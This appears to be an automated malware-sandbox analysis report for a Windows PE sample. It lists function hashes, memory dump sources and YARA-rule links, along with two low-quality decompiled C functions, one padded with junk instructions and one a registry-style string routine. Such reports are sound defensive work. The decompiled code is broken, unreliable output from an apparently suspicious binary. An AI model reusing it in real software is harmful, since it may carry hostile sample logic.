Instruction ID: 6dff3afe43afd9c5184942456a93873a3e40cded77bf18360e9d415037e8ce0c
Opcode Fuzzy Hash: 66ce5a112c656f4b746fef003207868ca2d17ca3cd5859bfac1f2344c0911ee7
Instruction Fuzzy Hash: BA51BC61D7EB0489D6066D2084806B16D4CEBD735B730DB7B85BB724E2A63E0F4B358E

Uniqueness

Uniqueness Score: -1.00%

Function 004031D2, Relevance: 1.6, APIs: 1, Instructions: 328memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cf89adde7ea7b65e1950530d90567c8e05eef74915650b8bd9565d7e53709c0f
Instruction ID: e61a6525a9317a018d6c6e1fa392f4f1b147ddb2944764934cf3b16ca85b1506
Opcode Fuzzy Hash: cf89adde7ea7b65e1950530d90567c8e05eef74915650b8bd9565d7e53709c0f
Instruction Fuzzy Hash: D951596593D60495CB095E2885896706D4EEAD33373209BFF84B7B60F1A63D4B8B314F

Uniqueness

Uniqueness Score: -1.00%

Function 00403037, Relevance: 1.6, APIs: 1, Instructions: 325
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00403037(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t33;
				void* _t50;
				void* _t62;
				void* _t72;
				void* _t74;

				_t72 = __esi;
				_t62 = __edi;
				_t50 = __ecx;
				_t33 = __eax;
				asm("adc eax, 0x8e492efe");
				cs =  *((intOrPtr*)(__esi - 0x71717172));
				cs =  *((intOrPtr*)(__esi - 0x71717172));
				cs =  *((intOrPtr*)(__esi - 0x71717172));
				cs =  *((intOrPtr*)(__esi - 0x71717172));
				cs =  *((intOrPtr*)(__esi - 0x71717172));
				goto L1;
				asm("clc");
				_t74 = _t72 - 1 + 1;
				asm("emms");
				asm("fsubr st5, st0");
			}

0x00403037
0x00403037
0x00403037
0x00403037
0x00403037
0x0040303c
0x00403042
0x00403048
0x0040304e
0x00403054
0x00403054
0x00403074
0x00403076
0x00403077
0x00403079

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39544794ebdade2a5ed561e34c2cb244860b478a6774e8b6cb4a51968f2a67a6
Instruction ID: 0bcb3241aaae8d0542e0476f4e234c10bb4bb7007255b5dd7323396e41e1b990
Opcode Fuzzy Hash: 39544794ebdade2a5ed561e34c2cb244860b478a6774e8b6cb4a51968f2a67a6
Instruction Fuzzy Hash: 08618B6892FA04C8C9215E2584806B36D4CEAE7747330DB7B44A7722D9A2BE0F0731CF

Uniqueness

Uniqueness Score: -1.00%

Function 00402D98, Relevance: 1.6, APIs: 1, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: af48ee34ea2e708af85016c58ea93954f000569a0f6afa50b3281cfaeab57157
Instruction ID: d6ff190ea57c5741104d7ec3fb233fa021797149f5e50a1bf5ec569787defbce
Opcode Fuzzy Hash: af48ee34ea2e708af85016c58ea93954f000569a0f6afa50b3281cfaeab57157
Instruction Fuzzy Hash: BC51CB61D7DA4489D6025D2080842B16D4CEB97357330EBBB85BB760E2A63E0F8B318E

Uniqueness

Uniqueness Score: -1.00%

Function 004030D7, Relevance: 1.5, APIs: 1, Instructions: 284memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ca8b7f54e6e6215cdebfaafd8ae1209a713215b437da35aa11003124845841af
Instruction ID: 16693e28684311e33f57deb334f68df6a24bcc1cffd3281f3b85118461dfb923
Opcode Fuzzy Hash: ca8b7f54e6e6215cdebfaafd8ae1209a713215b437da35aa11003124845841af
Instruction Fuzzy Hash: F841AFA1D7D74498D6016D20C4806B16D4CFB9775B730DBBB85BBB20E2A63E0F4B3589

Uniqueness

Uniqueness Score: -1.00%

Function 004034BC, Relevance: 1.5, APIs: 1, Instructions: 269memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 021dacd521c45e0dc41c48f121e8ded29c9b020938cf01786f76393ab70ba0d4
Instruction ID: 445c803e314f3cef0579cb2c3b9633dc9b5b8635ee1cf2e0c70f4a09cd8e8a8d
Opcode Fuzzy Hash: 021dacd521c45e0dc41c48f121e8ded29c9b020938cf01786f76393ab70ba0d4
Instruction Fuzzy Hash: 44718D59814B4564FD217EBF6C4047C3A889DE527A3508F6A81F3620F3DBA91B87327E

Uniqueness

Uniqueness Score: -1.00%

Function 00402FE7, Relevance: 1.5, APIs: 1, Instructions: 268memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: de09db605ce0056d8eedd510f58b60ec13560f6a99444571512921325708e18d
Instruction ID: 22006e01c0d576cfb29797d48fc1d3cee355995ad3d462e9398b48fc81e1d8e9
Opcode Fuzzy Hash: de09db605ce0056d8eedd510f58b60ec13560f6a99444571512921325708e18d
Instruction Fuzzy Hash: 6651D0A1D3D74489D6026D2084805B16D4CFB9775B730DB7B41BBB60E2A63E0F4B358D

Uniqueness

Uniqueness Score: -1.00%

Function 0040312D, Relevance: 1.5, APIs: 1, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7e98f1df4881e391c709aea6b06ec194e2d6fcf7095bc54be0cdf62daa4c82e9
Instruction ID: 4f09987b4381fba43ed7456a724698d57be9d8b2c82f22eda7ce772eefe61591
Opcode Fuzzy Hash: 7e98f1df4881e391c709aea6b06ec194e2d6fcf7095bc54be0cdf62daa4c82e9
Instruction Fuzzy Hash: AA41A0A1D7D74498C6016D2084805B16D4CFB9775B730DBAB80BBB20E2A63E4F4B3589

Uniqueness

Uniqueness Score: -1.00%

Function 004033C0, Relevance: 1.5, APIs: 1, Instructions: 223memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ddefd7c790965b709af02766b34a47666f84cd4b491cad71ce178e9af66a4ce0
Instruction ID: 0732d2ce00172f212b9b15bb89b1da764a831d4d9004f893b7e3316f2f5fe531
Opcode Fuzzy Hash: ddefd7c790965b709af02766b34a47666f84cd4b491cad71ce178e9af66a4ce0
Instruction Fuzzy Hash: 02317DA5D2DB4898C6425D2084816B16D4CFBD775B330DB6740AB774E2A63E0F4B3589

Uniqueness

Uniqueness Score: -1.00%

Function 004032C4, Relevance: 1.5, APIs: 1, Instructions: 211memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 49a2a53acbff237805327282f02d5dac9f334578be1022ca6b944f75ad1c5aac
Instruction ID: f9bd8afa797896411b514b7b8b8e46162aa7da1ba12db001fd9aad6493902603
Opcode Fuzzy Hash: 49a2a53acbff237805327282f02d5dac9f334578be1022ca6b944f75ad1c5aac
Instruction Fuzzy Hash: 52418DA5D3DB0499C6429D2084805B17D8CFBD775B730DB6780A7761E2A63E0F4B3549

Uniqueness

Uniqueness Score: -1.00%

Function 00403365, Relevance: 1.5, APIs: 1, Instructions: 211memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9c57c73053c01018c13045e016eab598d17cd39d2f7dc09510926dd8a63a5e6f
Instruction ID: dce19c1def01e1cd7116564d8021932de96205d994a386a486dd14e2937302c8
Opcode Fuzzy Hash: 9c57c73053c01018c13045e016eab598d17cd39d2f7dc09510926dd8a63a5e6f
Instruction Fuzzy Hash: 57317AA5D2DB4898C6425D2084806B16D8CFBD775B330DB6780ABB70E2A63E4F4B3189

Uniqueness

Uniqueness Score: -1.00%

Function 0040346C, Relevance: 1.5, APIs: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5c33b1a7e129fbb9f6ee282b870183e51a78ab5cfee085cee4fdadfcf4f63a5b
Instruction ID: bf7f75a9a7ab889ce0ce69c9b1be2f232b83cad3f5fc7095d565764f0c592e55
Opcode Fuzzy Hash: 5c33b1a7e129fbb9f6ee282b870183e51a78ab5cfee085cee4fdadfcf4f63a5b
Instruction Fuzzy Hash: BC319DA5D3D74898C6459D2084816B16D8CEBD775B330DB6B80BBB70E2A63E0F4B3249

Uniqueness

Uniqueness Score: -1.00%

Function 0040326E, Relevance: 1.4, APIs: 1, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 082c66cedde15df34f0cfc4993fb191ade29ffe58f85a15b3ce56e471d58a337
Instruction ID: 7ff760777bafd81e8a6432db0fdf4d1bba0c2b28d0533a23f4368523d9a10abf
Opcode Fuzzy Hash: 082c66cedde15df34f0cfc4993fb191ade29ffe58f85a15b3ce56e471d58a337
Instruction Fuzzy Hash: 53418CA1D3DB4498C6025D2084C16B16D4CFBD775B730DB6740ABB20E1A63E4F4B358D

Uniqueness

Uniqueness Score: -1.00%

Function 00403312, Relevance: 1.4, APIs: 1, Instructions: 192memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5d4ecf013b789a1823adb96f63e56b161e4088fe8302cee91ae3dd3f8223ee56
Instruction ID: 2158c01790f34775eb138fc85f62eaca563a2473403541154af7a18d5ef2d139
Opcode Fuzzy Hash: 5d4ecf013b789a1823adb96f63e56b161e4088fe8302cee91ae3dd3f8223ee56
Instruction Fuzzy Hash: B541AEA5D7DB4898C6429D1084C06B16D4CFB9775B330DB6780EBB21E2A63E0F4F3249

Uniqueness

Uniqueness Score: -1.00%

Function 0040341A, Relevance: 1.4, APIs: 1, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e870ca801c1c0fbb9fbf303e27ba2f7606420f52a8d1df0647984e9b34f23838
Instruction ID: e87fe1191bcd305525dd366b6bd074937ecefb2cf4f0e704a8ce2d7f11bb4158
Opcode Fuzzy Hash: e870ca801c1c0fbb9fbf303e27ba2f7606420f52a8d1df0647984e9b34f23838
Instruction Fuzzy Hash: EF31AEA1D2D70499C6459D2084816B17E4CFB97357330DB6780A7770D2A63E4F4B3289

Uniqueness

Uniqueness Score: -1.00%

Function 0040350D, Relevance: 1.4, APIs: 1, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a29967af0344a84443eb58affe2533b233badc07b14dd28af16919f71a594bc5
Instruction ID: d7fb79a3cc4f1f630546246d1a167b31cf101750ac1c5abe0cc9324e6417e9a7
Opcode Fuzzy Hash: a29967af0344a84443eb58affe2533b233badc07b14dd28af16919f71a594bc5
Instruction Fuzzy Hash: 3831CD9693DB4488C6419D2044C06B17D8CFA9735B370DB7780AB731D1A63F0F4B3289

Uniqueness

Uniqueness Score: -1.00%

Function 004035B8, Relevance: 1.4, APIs: 1, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 00403601

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 68af385fb11974aa8abb6e4ec4cd0bfc5eb446a316717c9893d1e69a1f59250c
Instruction ID: be2626ffa7aefa40fe9ff8bb0f2333120265b24bf9cd131b2cbac2c5ff8b39ef
Opcode Fuzzy Hash: 68af385fb11974aa8abb6e4ec4cd0bfc5eb446a316717c9893d1e69a1f59250c
Instruction Fuzzy Hash: 84319EA5D2D74589C6419D2084906B17E88EED7257374CBB780BB770D2A63F4F4B3249

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004017F6, Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5f680e49d839fbfd8e0d8f7424295198c73d1c2b5e0ce248846ad0c75a3313
Instruction ID: 66779e33708b624cb1e06704089130015e71e8a78ebbd5beed843ceb652affa8
Opcode Fuzzy Hash: cb5f680e49d839fbfd8e0d8f7424295198c73d1c2b5e0ce248846ad0c75a3313
Instruction Fuzzy Hash: E041269125E2D4EFC71B47B64CBA2813FE16E07104B1A88EFD6C54B8A3E519241FD727

Uniqueness

Uniqueness Score: -1.00%

Function 00401A36, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428acb89cf9b99c871daf00860136c15476c4425046302523451e5537aac81d0
Instruction ID: ca188a72de3c5ad16c4800c61484eb54314e7ef8d45a9d797dba8be1467a3c68
Opcode Fuzzy Hash: 428acb89cf9b99c871daf00860136c15476c4425046302523451e5537aac81d0
Instruction Fuzzy Hash: 3D21AA7150D3D5DFCB174B748C652517FB0AF1B20170A44EBD8819F8A7E268281AD727

Uniqueness

Uniqueness Score: -1.00%

Function 004019E9, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBD4, Relevance: 72.3, APIs: 48, Instructions: 326
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040BBD4(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, signed int _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char* _v32;
				char* _v36;
				void* _v40;
				signed int _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				signed int _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				short _v104;
				char _v112;
				char _v128;
				char _v144;
				char* _v152;
				char _v160;
				intOrPtr _v200;
				char _v208;
				char* _v212;
				short _v216;
				char* _v220;
				signed int _v224;
				signed int _v228;
				char* _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v260;
				char* _t158;
				void* _t159;
				char* _t160;
				char* _t163;
				char* _t166;
				signed short _t175;
				char* _t187;
				intOrPtr _t188;
				signed int _t190;
				short _t201;
				char* _t206;
				intOrPtr _t213;
				void* _t215;
				void* _t218;
				void* _t222;
				char* _t227;
				void* _t245;
				void* _t248;
				void* _t249;
				void* _t250;
				void* _t252;
				intOrPtr _t253;
				void* _t254;
				intOrPtr _t255;

				_t248 = __esi;
				_t245 = __edi;
				_t222 = __ebx;
				_t250 = _t252;
				_t253 = _t252 - 0xc;
				 *__ecx =  *__ecx + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + 0x64)) =  *((intOrPtr*)(__eax + 0x64)) + __edx;
				 *0 = _t253;
				L004011F0();
				_v16 = _t253;
				_v12 = E00401120;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x4011f6, _t249);
				_push( &_v28);
				_push(0x2003f);
				_push(0);
				_push( *_a12);
				_t158 =  &_v60;
				_push(_t158);
				L00401376();
				_push(_t158);
				_t159 = _a8;
				_push( *_t159);
				E0040B28C();
				_v212 = _t159;
				L00401370();
				_push(_v60);
				_push(_a12);
				L0040136A();
				_t160 = _v212;
				_v36 = _t160;
				L00401364();
				if(_v36 == 0) {
					_v72 = _v72 & 0x00000000;
					_v80 = 2;
					_push( &_v80);
					_push(0x400);
					L00401358();
					L0040135E();
					L00401352();
					_v56 = 0x400;
					_push( &_v56);
					_push(_v52);
					_t163 =  &_v64;
					_push(_t163);
					L00401376();
					_push(_t163);
					_push( &_v40);
					_push(0);
					_push( *_a16);
					_t166 =  &_v60;
					_push(_t166);
					L00401376();
					_push(_t166);
					_push(_v28);
					E0040B2F0();
					_v212 = _t166;
					L00401370();
					_push(_v60);
					_push(_a16);
					L0040136A();
					_push(_v64);
					_push( &_v52);
					L0040136A();
					_v36 = _v212;
					_push( &_v64);
					_t160 =  &_v60;
					_push(_t160);
					_push(2);
					L0040134C();
					_t254 = _t253 + 0xc;
					if(_v36 == 0) {
						_v72 = 1;
						_v80 = 2;
						_v152 =  &_v52;
						_v160 = 0x4008;
						_push( &_v80);
						_push(_v56);
						_push( &_v160);
						_push( &_v96);
						L0040133A();
						_push( &_v96);
						_t175 =  &_v60;
						_push(_t175);
						L00401340();
						_push(_t175);
						L00401346();
						asm("sbb eax, eax");
						_v216 =  ~( ~_t175 + 1);
						_t227 =  &_v60;
						L00401364();
						_push( &_v96);
						_push( &_v80);
						_push(2);
						L00401334();
						_t255 = _t254 + 0xc;
						if(_v216 == 0) {
							_v152 =  &_v52;
							_v160 = 0x4008;
							_push(_v56);
							_push( &_v160);
							_push( &_v80);
							L00401328();
							_push( &_v80);
							L0040132E();
							L0040135E();
							L00401352();
							goto L11;
						} else {
							_v152 =  &_v52;
							_v160 = 0x4008;
							_t218 = _v56 - 1;
							if(_t218 < 0) {
								L25:
								L004012FE();
								_push(_t250);
								_push(_t227);
								_push(_t227);
								_push(0x4011f6);
								_push( *[fs:0x0]);
								 *[fs:0x0] = _t255;
								_t215 = 0x10;
								L004011F0();
								_push(_t222);
								_push(_t248);
								_push(_t245);
								_v248 = _t255;
								_v244 = 0x401130;
								_v260 = 0xa066336a;
								_push(0xfbfc2c35);
								_push(0x402622);
								return _t215;
							} else {
								_push(_t218);
								_push( &_v160);
								_push( &_v80);
								L00401328();
								_push( &_v80);
								L0040132E();
								L0040135E();
								L00401352();
								L11:
								_v220 = _v40;
								_t187 = _v220;
								_v240 = _t187;
								if(_v240 == 1) {
									L00401322();
									goto L21;
								} else {
									if(_v240 == 4) {
										_v228 = 1;
										_v224 = _v224 | 0xffffffff;
										_push(_v52);
										L0040131C();
										_v32 = _t187;
										while(_v32 >= _v228) {
											_v200 =  *_a20;
											_v208 = 8;
											_v72 = 1;
											_v80 = 2;
											_v152 =  &_v52;
											_v160 = 0x4008;
											_push( &_v80);
											_push(_v32);
											_push( &_v160);
											_push( &_v96);
											L0040133A();
											_push( &_v96);
											_t201 =  &_v60;
											_push(_t201);
											L00401340();
											_push(_t201);
											L00401346();
											_v104 = _t201;
											_v112 = 2;
											_push( &_v112);
											_push( &_v128);
											L00401310();
											_push( &_v208);
											_push( &_v128);
											_t206 =  &_v144;
											_push(_t206);
											L00401316();
											_push(_t206);
											L0040132E();
											L0040135E();
											_t227 =  &_v60;
											L00401364();
											_push( &_v144);
											_push( &_v128);
											_push( &_v112);
											_push( &_v96);
											_push( &_v80);
											_push(5);
											L00401334();
											_t255 = _t255 + 0x18;
											_t213 = _v32 + _v224;
											if(_t213 < 0) {
												goto L25;
											} else {
												_v32 = _t213;
												continue;
											}
											goto L27;
										}
										_v88 = 0x80020004;
										_v96 = 0xa;
										_push(0x40b390);
										_t190 = _a20;
										_push( *_t190);
										L00401304();
										_v72 = _t190;
										_v80 = 8;
										_push(1);
										_push(1);
										_push( &_v96);
										_push( &_v80);
										L0040130A();
										L0040135E();
										_push( &_v96);
										_t187 =  &_v80;
										_push(_t187);
										_push(2);
										L00401334();
										goto L21;
									} else {
										L21:
										_v48 = _v48 | 0x0000ffff;
										_push(_v28);
										E0040B334();
										_v212 = _t187;
										L00401370();
										_t188 = _v212;
										_v36 = _t188;
										goto L23;
									}
								}
							}
						}
					} else {
						goto L22;
					}
				} else {
					L22:
					L00401322();
					_v48 = _v48 & 0x00000000;
					_push(_v28);
					E0040B334();
					_v212 = _t160;
					L00401370();
					_t188 = _v212;
					_v36 = _t188;
					L23:
					_push(E0040C052);
					L00401364();
					return _t188;
				}
				L27:
			}

0x0040bbd4
0x0040bbd4
0x0040bbd4
0x0040bbd5
0x0040bbd7
0x0040bbde
0x0040bbe2
0x0040bbe4
0x0040bbe7
0x0040bbf2
0x0040bbfa
0x0040bbfd
0x0040bc04
0x0040bc13
0x0040bc19
0x0040bc1a
0x0040bc1f
0x0040bc24
0x0040bc26
0x0040bc29
0x0040bc2a
0x0040bc2f
0x0040bc30
0x0040bc33
0x0040bc35
0x0040bc3a
0x0040bc40
0x0040bc45
0x0040bc48
0x0040bc4b
0x0040bc50
0x0040bc56
0x0040bc5c
0x0040bc65
0x0040bc6c
0x0040bc70
0x0040bc7a
0x0040bc7b
0x0040bc80
0x0040bc8a
0x0040bc92
0x0040bc97
0x0040bca1
0x0040bca2
0x0040bca5
0x0040bca8
0x0040bca9
0x0040bcae
0x0040bcb2
0x0040bcb3
0x0040bcb8
0x0040bcba
0x0040bcbd
0x0040bcbe
0x0040bcc3
0x0040bcc4
0x0040bcc7
0x0040bccc
0x0040bcd2
0x0040bcd7
0x0040bcda
0x0040bcdd
0x0040bce2
0x0040bce8
0x0040bce9
0x0040bcf4
0x0040bcfa
0x0040bcfb
0x0040bcfe
0x0040bcff
0x0040bd01
0x0040bd06
0x0040bd0d
0x0040bd14
0x0040bd1b
0x0040bd25
0x0040bd2b
0x0040bd38
0x0040bd39
0x0040bd42
0x0040bd46
0x0040bd47
0x0040bd4f
0x0040bd50
0x0040bd53
0x0040bd54
0x0040bd59
0x0040bd5a
0x0040bd62
0x0040bd67
0x0040bd6e
0x0040bd71
0x0040bd79
0x0040bd7d
0x0040bd7e
0x0040bd80
0x0040bd85
0x0040bd91
0x0040bde3
0x0040bde9
0x0040bdf3
0x0040bdfc
0x0040be00
0x0040be01
0x0040be09
0x0040be0a
0x0040be14
0x0040be1c
0x00000000
0x0040bd93
0x0040bd96
0x0040bd9c
0x0040bda9
